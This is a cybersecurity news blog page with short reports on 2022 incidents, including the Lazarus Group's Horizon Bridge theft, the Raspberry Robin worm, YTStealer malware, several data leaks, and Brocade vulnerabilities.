Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

North Korean Hackers
Breach Crypto Crime Data Breach Lazarus Group North Korea North Korean Hackers

Lazarus Group Responsible For $100M Crypto-Heist


Cyber security researchers have found Lazarus Group responsible for stealing $100m worth of crypto via Harmony's Horizon Bridge, a California-based company. Lazarus group is a popular North Korean state-sponsored hacking group that was also behind $620 million worth of crypto theft from the Ronin exchange in March. 

Following the incident, the Harmony cybersecurity team was warned of the attack last week by blockchain forensics company Elliptic that the institution has been attacked by a cross-chain bridge. 

“There are strong indications that North Korea’s Lazarus Group may be responsible for this theft, based on the nature of the hack and the subsequent laundering of the stolen funds,” Elliptic wrote. 

Additionally, Reuters reported that Chainalysis, a blockchain firm is also investigating with Harmony; it claims that the attack style is similar to previous attacks attributed to North Korea-linked actors.

“On Thursday, June 23, 2022, the Harmony Protocol team was notified of a malicious attack on our proprietary Horizon Ethereum Bridge. At 5:30 AM PST, multiple transactions occurred that compromised the bridge with 11 transactions that extracted tokens stored in the bridge,” the company said in its blog. 

As the name suggests, Blockchain bridges allow users to transfer their crypto assets from one blockchain to another. The malicious actors stole $100 million in crypto assets, including Ethereum (ETH), Binance Coin, Tether, USD Coin, EOS, and Dai. 

Elliptic said that the hack was carried out by compromising the cryptographic keys of a multi-signature wallet, a technique that is popularly used by the suspected groups. 

“Lazarus Group tends to focus on APAC-based targets, perhaps for language reasons referring to the Asia-Pacific region. Although Harmony is based in the US, many of the core team has links to the APAC region,” Elliptic added. 

Further, the report suggests that after two days of attack Harmony offered to pay a $1 million bounty to the group for the return of Horizon bridge funds. Also, researchers reported that they have found the offenders behind the $100 million hack.
Read more »
worm
malware Noxious servers Windows worm

Microsoft Detects Raspberry Robin Worm in Windows Networks

According to Microsoft, a recently detected Windows worm has been discovered on the networks of hundreds of firms from numerous industry sectors. 

The malware, called Raspberry Robin, spreads via infected USB devices and was discovered by Red Canary intelligence experts in September 2021.] In early November, cybersecurity company Sekoia detected it using QNAP NAS devices as command and control servers (C2) servers, while Microsoft stated it discovered harmful artefacts tied to this worm produced in 2019. 

Redmond's findings are consistent with those of Red Canary's Detection Engineering team, which discovered this worm on the networks of several clients, including several in the technology and manufacturing industries. Despite the fact that Microsoft saw the malware communicating to Tor network addresses, the threat actors are yet to exploit the access they gained to their victims' networks. 

As already mentioned, Raspberry Robin is spreading to new Windows frameworks by means of contaminated USB drives containing a noxious .LNK document. When the USB gadget is joined and the user taps the link, the worm brings forth a msiexec interaction utilizing cmd.exe to send off a noxious document put away on the contaminated drive. It infects new Windows gadgets, speaks with its order and control servers (C2), and executes noxious payloads utilizing a few genuine Windows utilities: 
  • fodhelper (a trusted binary for managing features in Windows settings),
  • msiexec (command line Windows Installer component),
  • and odbcconf (a tool for configuring ODBC drivers).
"While msiexec.exe downloads and executes legitimate installer packages, adversaries also leverage it to deliver malware," Red Canary researchers explained. "Raspberry Robin uses msiexec.exe to attempt external network communication to a malicious domain for C2 purposes."

Security specialists who have seen Raspberry Robin in the wild are yet to link the malware to a threat group and are yet dealing with tracking down its administrators' ultimate objective. In any case, Microsoft has labelled this mission as high-risk, considering that the attackers could download and convey extra malware inside the casualties' organizations and heighten their honours anytime.
Read more »
data security
API API Bug Cyber Secuirty Data Leak data security

Susceptible APIs Costing Organizations Billions Every year

 

Last week, threat intelligence firm Imperva published a report titled ‘Quantifying the Cost of API Insecurity’, which examined nearly 117,000 security incidents and unearthed that API insecurity was responsible for annual losses of between $41- 75 billion globally. 

The study conducted by the Marsh McLennan Cyber Risk Analytics Center discovered that larger enterprises had a higher threat of having API-related breaches, with organizations making more than $100 billion in revenue being three to four times more likely to face API insecurity than small or midsize enterprises. 

The security analysts identified that Asia has a high incident rate with between 16% and 20% of cyber-security incidents related to API insecurity. This is likely due to the rapid digital transformation happening across Asia, especially in regard to mobile, as the majority of digital transactions in Asia are done through mobile. 

 How are businesses getting API security so wrong? 

An API is the invisible connective tissue that allows applications to transfer data to enhance end-user experiences and results. "The growing security risks associated with APIs correlate with the proliferation of APIs," says Lebin Cheng, vice president of API security for Imperva. 

"The volume of APIs used by businesses is growing rapidly — nearly half of all businesses have between 50 and 500 deployed, either internally or publicly, while some have over a thousand active APIs." 

Businesses are frequently failing to secure APIs, with 95% of enterprises suffering an API security incident in the last 12 months, and 34% acknowledging they lack any kind of API security methodology— despite running APIs in production. 

“Many organizations are failing to protect their APIs because it requires equal participation from the security and development teams,” Cheng explained. “Historically, these groups have been at odds —security is the party of no, and devops is irresponsible and moves too fast. In order to address these challenges, security leaders have to enable application developers to create secure code using technology that is lightweight and works efficiently." 

 Tips for enhancing API security: 

Imperva recommended organizations adopt API governance by monitoring endpoints beyond their organizations. They should also monitor the data flowing through them to ensure that sensitive information is protected. 

Any methodology that security teams implement should include API discovery and data classification. This way, security experts can identify the schema of APIs, while spotting and classifying the data that passes through it, while employing testing to unearth any potential vulnerabilities.
Read more »
YTStealer Malware
Cyber Crime Data Theft malware YTStealer Malware

A New YTStealer Malware Targets YouTube Content Creator

Google Threat Analysis Group (TAG) has recently uncovered a new information-stealing malware, named 'YTStealer' that is targeting YouTube content creators by stealing their authentication cookies. Malicious actors sold breached data as a service on the dark web using fake installers that also drop RedLine Stealer and Vidar. 

"What sets YTStealer aside from other stealers sold on the dark web market is that it is solely focused on harvesting credentials for one single service instead of grabbing everything it can get ahold of," security researcher Joakim Kenndy said in a report shared by the blog post on Wednesday.

As per the research, the malware extracts YouTube authentication cookie information from the web browser's database files in the user's profile folder; then it opens a headless browser and connects to YouTube’s Studio page, which is used by content creators to control the content of the videos they produce.

Further, the malware steals all available personal data of users including the account name, number of subscribers, age, and whether channels are monetized. Following this, it encrypts all data samples with a unique key and sends both to a command and control server. 

The files' names which disguised as installers for legitimate tools or software:
  • OBS Studio, a piece of open-source streaming software 
  • Audio applications and plugins such as Antares Auto-Tune Pro, Valhalla DSP, FabFilter Total, and Xfer Serum 
  • Video editing software, including Adobe Premiere Pro, Filmora, and HitFilm Express 
  • Game modes and cheats for games such as Grand Theft Auto V, Roblox, Counter-Strike, and Call of Duty 
  • “Cracks” for legitimate software or services including Norton Security, Malwarebytes, Discord Nitro, Stepn, and Spotify Premium Driver tools such as “Driver Booster” and “Driver Easy
The researchers also discovered that the files used to install the malware on targeted devices loaded with other credential stealers, including RedLine and Vidar, Predator The Thief, Masad, Nexus stealer, Azorult, Vikro Stealer, Raccoon, Grand Stealer, and Kantal, along with open-source malware like Sorano and AdamantiumThief.
Read more »
User Security
Data Breach Data Leak User Data User Data Leak User Security

California Gun Permit Website Exposes User Data

 

About the Data Leak

A state website in California disclosed private information of any user who registered for CCP (concealed Carry Weapons) permits during 2011-2021. The California Department of Justice says the incident happened last week, in the blunder, the US state's firearms dashboard portal was overwhelmed. 

Besides the portal breach, the data was also leaked on various other online dashboards like- Assault Weapon Registery, Dealer Record of Sale, Firearm Safety Certificate, Certified for Sale, Dealer Record of Sale, Gun Violence Restraining Order, and Firearm Safety Certificate dashboards. 

What are the experts saying?

"The California cyber-gaffe comes at a time when data privacy is at the forefront of the national debate, in large part because of the US Supreme Court's recent decision to overturn Roe vs. Wade, which has called into question what personal data is collected, retained — and potentially sold or shared," reports the Register. 

California Department of Justice says that data and dashboards were accessible to the public for 24 hours. The data leaked include Gender, Race, Date of Birth, driver's license info, criminal histories, and addresses. However, it didn't expose financial information and social security numbers. 

Info exposed in the Data Leak 

But still, some personal information may have been leaked on social media websites, says Fresno County Sheriff's Office, which found the data leak. The state DOJ will inform California users whose data was leaked and will give additional info and details about soon. It also includes credit monitoring services for impacted users. 

"I immediately launched an investigation into how this occurred at the California Department of Justice and will take strong corrective measures where necessary," said Rob Bonta, California Attorney General, in a statement. He also said that he was deeply sorry and unsettled by the incident. 

The office didn't address the issue immediately, denying to provide info about the number of users affected and a number of California residents that apply for concealed weapons permit every year but are denied. 

Tim Marley, VP for audit, risk, and compliance at Cerberus Sentinel said that "the failure to keep stakeholders' sensitive data confidential is coming with greater consequences for organizations in the United States."
Read more »
REvil
Bitcoin Canada Crypto heist Cyber Security Double extortion FBI NetWalker RaaS REvil

Netwalker: Ex Canadian Government Employee Pleads Guilty to Cybercrimes 

 

An ex-government of Canada official pleaded guilty in a US court to crimes related to data theft stemming from his involvement with the NetWalker ransomware group. 

Sebastien Vachon-Desjardins admitted on Tuesday that he had planned to commit bank fraud and phishing scams, intentionally damaged a protected computer, and also sent another demand regarding that illegally damaged computer. 

 Plea agreement filled 

Vachon-Desjardins, 34, who had previously been sentenced to six years and eight months in prison after entering a guilty plea to five criminal offenses in Canada, was deported to the United States in March. 
Vachon-Desjardins is "one of the most prolific NetWalker Ransomware affiliates," as per his plea agreement, and was in charge of extorting millions of dollars from several businesses all over the world. Along with 21 laptops, smartphones, game consoles, and other technological devices, he will also forfeit $21.5 million. 

He has pleaded guilty to conspiracy to commit computer fraud, conspiracy to commit wire fraud, intentionally harming a protected computer, and conveying a demand related to intentionally damaging a protected computer, according to a court filing submitted this weekThe accusations carry a maximum punishment of 40 years in jail combined. The attorneys did not identify the targeted business, but they did indicate that it is based in Tampa and was assaulted on May 1, 2020. 

 NetWalker gang's collapse

In 2019, a ransomware-as-a-service operation called NetWalker first surfaced. It is thought that the malware's creators are based in Russia. Its standard procedure – a profitable strategy also known as double extortion, includes acquiring sensitive personal data, encrypting it, and then holding it hostage in exchange for cryptocurrencies, or risk having the material exposed online.

According to reports, the NetWalker gang intentionally targeted the healthcare industry during the COVID-19 pandemic to take advantage of the global disaster. To work for other RaaS groups like Sodinokibi (REvil), Suncrypt, and Ragnarlocker, Vachon-Desjardins is suspected of being connected to at least 91 attacks since April 2020 in his capacity as one of the 100 affiliates for the NetWalker gang. 

The Feds dismantled the crime gangs' servers and the dark website is used to contact ransomware victims as part of the takedown of the NetWalker gang. Then they took down Vachons-Desjardins, who, according to the FBI, made $27 million for the NetWalker gang. 

His role in cybercrime is said to have included gathering information on victims, managing the servers hosting tools for reconnaissance, privilege escalation, data theft, as well as running accounts that posted the stolen data on the data leak site and collecting payments following a successful attack. 

However, some victims did pay fees, and the plea deal connected Vachons-Desjardins to the successful extortion of roughly 1,864 Bitcoin in ransom payments, or about $21.5 million, from multiple businesses around the world.
Read more »
threat
Attack Hackers malware Passwords phishing Safety threat

Google Blocked Dozens of Domains Used by Hack-for-hire Groups

 

Google's Threat Analysis Group released a blog post on Thursday detailing the actions of hack-for-hire groups in Russia, India, and the United Arab Emirates. More than 30 domains used by these threat groups have been added to the internet giant's Safe Browsing system, preventing users from accessing them. 

Hack-for-hire groups are sometimes confused with businesses that provide surveillance tools. As per Google, surveillance vendors often give the tools required for spying but leave it up to the end-user to run them, whereas hack-for-hire groups perform the attacks themselves. Several hack-for-hire groups have been found in recent years. Google's investigation focuses on three groups thought to be based in India, Russia, and the United Arab Emirates. 

Google has been tracking the threat actor linked to India since 2012, with some of its members formerly working for offensive security firms. They now appear to be employed by Rebsec, a new firm that publicly sells corporate espionage services. The group has been observed phishing credentials for AWS, Gmail, and government services accounts from healthcare, government, and telecom firms in the Middle East. 

The Russia-linked threat actor, known as Void Balaur by others, has targeted journalists, politicians, NGOs and organisations, and persons who looked to be ordinary residents in Russia and neighbouring nations. Phishing was also used in these assaults. 

“After the target account was compromised, the attacker generally maintained persistence by granting an OAuth token to a legitimate email application like Thunderbird or generating an App Password to access the account via IMAP. Both OAuth tokens and App Passwords are revoked when a user changes their password,” explained Shane Huntley, director of Google’s Threat Analysis Group. 

This group also had a public website where it advertised social media and email account hacking services. The UAE group primarily targets government, political, and educational groups in North Africa and the Middle East. This threat actor also employs phishing emails, but unlike many other organisations, it employs a custom phishing kit rather than open source phishing frameworks. 

“After compromising an account, the actor maintains persistence by granting themselves an OAuth token to a legitimate email app like Thunderbird, or by linking the victim Gmail account to an attacker-owned account on a third-party mail provider. The attacker would then use a custom tool to download the mailbox contents via IMAP,” Huntley said. 

Google believes Mohammed Benabdellah, who was sued by Microsoft in 2014 for developing the H-Worm (njRAT) malware, is associated with the group.
Read more »
User Security
cryptocurrency Data Breach Data Leak User Privacy User Security

NFT Marketplace OpenSea Suffers a Major Data Breach

 

Earlier this week, NFT marketplace OpenSea revealed a data breach and warned users of phishing assaults that could target them in the coming days. 

The company's Head of Security, Cory Hardman, said that an employee of its email delivery vendor, Customer.io, allegedly downloaded and shared stored email addresses linked with OpenSea accounts and newsletter subscriptions with an unknown third party. 

"If you have shared your email with OpenSea in the past, you should assume you were impacted. We are working with Customer.io in their ongoing investigation, and we have reported this incident to law enforcement," Hardman stated. Because the data compromise included email addresses, there may be a heightened likelihood for email phishing attempts." 

The crypto platform has more than 600,000 users and a transaction volume that surpassed $20 billion earlier this January. Customers were also told to look for emails sent from domains that hackers could exploit to spoof OpenSea's official email domain opensea.io. 

Examples of domains that could be employed in phishing attacks targeting OpenSea users include opensea.org, opensea.xyz, and opeansae.io.

Additionally, the company shared a set of safety recommendations that would help defend against phishing attempts advising them to be suspicious of any emails trying to mimic OpenSea, not to download and open email attachments, and to check the URLs of pages linked in OpenSea emails.

Users are also urged never to share or confirm their passwords or secret wallet phrases and never to sign wallet transactions if prompted directly via email.

"We wanted to share the information we have at this time, and let you know that we've reported the incident to law enforcement and are cooperating in their investigation," Hardman added. 

Recently, crypto platforms have emerged as a lucrative target for malicious hackers as the industry witnesses rapid growth and money flooding in. Blockchain-based, decentralized networks promise better security, but average users today lean toward centralized services like OpenSea for their convenience. 

Earlier in March, a data leak at HubSpot, a customer-relations management software firm, led to data breaches at BlockFi, Circle, and others. Fractal, an NFT platform started by Twitch co-founder Justin Kan, had a rocky debut last year in December after a fraudster hacked the announcement bot to siphon $150,000.
Read more »
Travel Company
Black Shadow Check Point Cyber Attacks Iranian hackers Israel Travel Company

Iranian Hackers: Israeli Tourism Sites Targeted

A malware targeted websites for the Israeli public transportation companies Dan and Kavim, a children's museum, and a public radio blog. Reportedly, none of the sites were reachable to users by Saturday noon.

On Tuesday, the Sharp Boys hacking group claimed to have stolen data from Israeli travel websites, including ID numbers, addresses, credit card details, and etc.

Websites were compromised 

As per hackers, the affected websites are hotels.co.il, isrotel.com, minihotel.co.il, tivago.co.il, and danhotels.com. Tuesday morning, according to the company, hotels.co.il was inaccessible, however by Tuesday afternoon, the site had loaded. 

"Hello once more! If you don't want your data disclosed by us, contact us as soon as possible," on Friday night, the hackers posted a message on Telegram. A follow-up message stated: "They did not get in touch with us, the first list of data is here " the group said, posting the data online.

Later on Saturday, the gang uploaded what it claimed to be information about customers of the Dan transportation company and a travel agency in a new message that claimed to have more data. "You are under our control no matter where you go, even on your travels. Please keep our name in mind." In an image shared on a Telegram account, Sharp Boys made the statement. 

Everything to know about Sharp Boys cyber gang

According to Israeli media, Sharp Boys is a hacking group with links to Iran that conducts cyber espionage for illicit purposes. 

The Sharp Boys hacker group first appeared in December when it claimed to have affected two Israeli hiking websites. They also claimed to have taken control of the website's backend administration and released a spreadsheet that contained the personal data of 120,000 people. 

In December last year, the group hacked into the Shirbit insurance company in Israel and stole vast volumes of data. When the company declined to pay the $1 million ransom demand, it exposed the data. A spreadsheet that contained personal data and credit card details for 100,000 people was released.

According to a report released on Tuesday by the Israeli cybersecurity firm Check Point, the average weekly number of assaults on businesses in the travel and leisure industry increased globally by 60% in June 2022 compared to the first half of June 2021.
Read more »
USA
API API- Application Programming Interface Cybersecurity Breach Data Breach USA

API Security Losses Total Billions, US Companies Hit Hard


According to the analysis of breach data, US companies are the ones affected the most by the APIs. Companies have lost a combined amount of $12 billion to $23 billion in 2022 from compromises linked to Web application programming interfaces (APIs). 

APIs are used in Internet of Things (IoT) applications and on websites. An API is a mechanism that facilitates two software systems to interact. It controls the types of requests that take place between programs, how these requests are made, and the kinds of data formats used. For example, the Google Maps application on a mobile device does not contain names of all the streets, cities, towns, and other landmarks on your device. Instead, it connects to another application within the Google server that contains all of that information and this connection is made possible using an API. 

The data over the last decade suggests that API security has leveled up as a significant cybersecurity problem. Following the information, the Open Web Security Application Project (OWASP) has listed the top 10 APl security issues in 2019. 

It has explained various API weaknesses including broken authorization for objects, weak user authentication, and excessive data exposure as sensitive issues for software makers and companies that rely on cloud services. Thus, API security has become increasingly important. 

APIs work as the backend framework for mobile and web applications. Crucial and sensitive data is transferred between users, APIs, and applications and systems. Therefore, it is important to protect the sensitive data they transfer. 

According to the report 'Quantifying the Cost of API Insecurity' published this week by application-security firm Imperva and risk-strategy firm Marsh McLennan – cybersecurity issues would grow as APIs continue to become a common pattern for cloud and mobile devices.

"The growing security risks associated with APIs correlate with the proliferation of APIs. The volume of APIs used by businesses is growing rapidly — nearly half of all businesses have between 50 and 500 deployed, either internally or publicly, while some have over a thousand active APIs," says Lebin Cheng, vice president of API security for Imperva. 

Further, in Asia, more than 100 combined API security incidents occurred, and in the US more than 600 API security events. To prevent this, companies have to gain visibility into how they are using APIs and create a complete inventory of the API traffic in their network.
Read more »
Vulnerability and Exploits
data security Device Security HPE Vulnerability and Exploits

How vulnerability in Brocade Might Affect Major Companies


Broadcom disclosed that few softwares made by Brocade, its storage network subsidiary, is hit by various vulnerabilities, and the exploits can affect the products of various big companies. A similar incident happened with HPE earlier this year.

How does the vulnerability impact?

The Brocade SAN (storage area network) management app is impacted by 9 flaws, the patches are available for these security holes. 

Six vulnerabilities affect third-party products like Open SSL, Oracle Java, and NGINX, these are rated "medium severity" and "low severity."

A hacker can exploit these vulnerabilities (unauthorised attacker) and modify data, decode data, and make a Denial of Service (DoS) situation. 

The other three vulnerabilities are limited to Brocade SANnav, these are given "high" severity risk and impact ratings. 

The vulnerabilities let a hacker access switch and server passwords from log files, and hack potential sensitive info via static key ciphers.

About the vulnerability

The security flaws (CVE-2022-28167, CVE-2022-28168 and CVE-2022-28166) were discovered internally and currently no use of the exploit in the wild has been found. 

But the storage solutions of several companies that collaborate with Brocade can be impacted by these flaws. 

HPE in its advisory told the customers that the company's B series SANNav Management Portal is impacted by the exploits and suggested the customers to install the latest updates. 

The flaws can be exploited locally and remotely to leak sensitive info, attempt unauthorised access and modify data cause partial Denial of Service.

Other info related to Brocade vulnerability 

Another Brocade partner NetApp released individual advisories for the Brocade specific SANNav vulnerabilities. The NetApp products have not been affected. Brocade also partners with other big tech companies for storage solutions that include Huawei, Dell, Lenovo, IBM and Fujitsu. 

Security Week says "one of the other Brocade OEM partners appear to have published advisories for the SANnav vulnerabilities so it’s unclear if their products are also impacted. In the past, at least some of them did publish advisories to notify their customers about SANnav flaws."









Read more »
Subscribe to: Comments (Atom)